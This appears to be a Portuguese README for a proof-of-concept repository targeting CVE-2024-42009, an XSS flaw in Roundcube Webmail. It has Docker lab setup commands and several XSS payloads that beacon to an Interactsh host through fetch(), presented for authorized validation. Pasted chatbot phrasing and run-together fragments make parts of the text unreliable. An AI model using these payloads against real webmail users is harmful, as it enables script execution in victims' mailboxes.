
Templates Nuclei e laboratório Docker para demonstrar e validar CVE-2024-42009, um XSS refletido no Roundcube Webmail, usando detecção Out-of-Band via Interactsh para testes autorizados.
Este repositório contém um template Nuclei e recursos de suporte para demonstrar e validar com segurança CVE-2024-42009, uma vulnerabilidade crítica de XSS refletido no Roundcube Webmail. A falha reside na função message_body() em show.php, onde modificações pós-saneamento levam à dessanitização e renderização insegura de conteúdo de e-mail HTML manipulado.
⚠️ Esta PoC é destinada apenas para fins educacionais e testes autorizados. Não use contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
message_body() em show.phpEste repositório usa detecção Out-of-Band (OOB) via Interactsh para confirmar a execução de JavaScript em um ambiente controlado.
<body> contendo onanimationstart e um beacon para o InteractshUse o arquivo Docker Compose fornecido para iniciar uma instância local do Roundcube com MailHog (SMTP sink) e MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ Não use sua conta Google.
CVE-2024-42009-OOB.yaml – Template Nuclei com detecção Interactsh e Out-of-Band (OOB)CVE-2024-42009.yaml – Template Nuclei sem Interactsh e OOBdocker-compose.yml – Configuração do ambiente de laboratório para Roundcube WebmailImages/ – Capturas de tela mostrando hits HTTP/DNS do InteractshEste vídeo percorre toda a cadeia de exploração:
Para incluir esses payloads XSS de forma responsável em seu README, coloque-os em uma seção claramente identificada como para fins educacionais ou de teste. Aqui está uma estrutura sugerida:
⚠️ Aviso: Estes payloads são destinados ao uso educacional e a testes de segurança autorizados. Não os implante em sistemas sem permissão explícita.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit pelo seu próprio endpoint de listener.Atualize o Roundcube para:
Perfeito — aqui está uma seção de Referências limpa e profissional que você pode incluir no seu README ou submissão de e-mail para CVE-2024-42009. Ela cita todas as fontes que você listou, formatadas para clareza e credibilidade: